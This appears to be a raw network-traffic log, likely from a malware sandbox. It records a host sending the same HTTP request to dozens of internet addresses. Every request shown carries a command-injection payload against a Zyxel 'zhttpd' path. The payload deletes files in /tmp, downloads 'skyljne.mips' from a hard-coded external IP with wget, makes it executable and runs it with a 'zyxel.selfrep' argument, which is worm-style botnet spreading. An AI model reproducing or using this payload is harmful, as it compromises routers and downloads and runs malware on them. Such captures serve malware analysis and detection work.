                                    Jan 13, 2024 19:02:21.887989998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1389192.168.2.135365841.193.116.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888019085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1390192.168.2.1359730125.140.177.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888077021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1391192.168.2.134644472.220.59.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888122082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1392192.168.2.1348504112.210.25.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888134956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1393192.168.2.134932672.226.234.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888179064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1394192.168.2.1355072129.112.107.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888223886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1395192.168.2.134212639.143.114.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888283014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1396192.168.2.1354852178.33.164.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888317108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1397192.168.2.135355623.70.149.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888358116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1398192.168.2.134112678.28.174.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888411045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1399192.168.2.1348308171.161.82.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888454914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1400192.168.2.1336968179.98.110.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888483047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1401192.168.2.133640891.145.226.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888513088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1402192.168.2.135367259.30.47.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888537884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1403192.168.2.1342796112.149.60.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888597965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1404192.168.2.1347166223.28.19.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888643026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1405192.168.2.1350354220.130.182.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888648033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1406192.168.2.1336618191.41.141.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888688087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1407192.168.2.135341454.15.140.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888746977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1408192.168.2.1357936162.31.45.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888789892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1409192.168.2.1358346172.109.85.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888847113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1410192.168.2.134364458.116.182.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888886929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1411192.168.2.1339220163.106.207.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888919115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1412192.168.2.134295877.40.38.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888962030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1413192.168.2.1358256123.248.102.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.888983011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1414192.168.2.134418276.148.253.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889024019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1415192.168.2.1353546172.189.230.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889058113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1416192.168.2.1342158163.74.24.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889085054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1417192.168.2.1352062116.142.205.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889159918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1418192.168.2.134750879.26.216.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889185905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1419192.168.2.133507843.97.152.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889213085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1420192.168.2.1346290193.174.238.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889241934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1421192.168.2.134789649.56.218.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889286995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1422192.168.2.1340026172.111.180.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889302969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1423192.168.2.1349740218.94.206.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889353037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1424192.168.2.133647063.185.88.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889400959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1425192.168.2.1336894221.247.143.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889427900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1426192.168.2.133683449.1.29.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889472008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1427192.168.2.1333426203.174.34.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889501095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1428192.168.2.134601820.32.214.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889556885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1429192.168.2.1335530104.83.159.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889596939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1430192.168.2.134597437.28.181.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889631987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1431192.168.2.1335984118.185.89.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889678001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1432192.168.2.134279245.80.46.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889700890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1433192.168.2.1359920178.194.103.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889739990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1434192.168.2.134237692.63.76.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889796019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1435192.168.2.1344162180.91.155.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889847994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1436192.168.2.136004041.73.216.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889880896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1437192.168.2.1341430133.199.126.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889930010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1438192.168.2.1356294119.74.103.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889971972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1439192.168.2.1340510171.250.95.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.889996052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1440192.168.2.1339812217.84.61.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890047073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1441192.168.2.1336394100.221.184.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890088081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1442192.168.2.134517280.142.244.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890125990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1443192.168.2.135150434.173.244.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890172005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1444192.168.2.1341902119.53.226.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890202045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1445192.168.2.1356180118.255.59.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890240908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1446192.168.2.1346704106.220.43.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890290976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1447192.168.2.134844892.252.85.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890330076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1448192.168.2.133882448.182.5.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890361071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1449192.168.2.134020269.139.143.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890389919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1450192.168.2.135104050.56.100.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890436888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1451192.168.2.1342378192.87.110.211443
                                    TimestampBytes transferredDirectionData
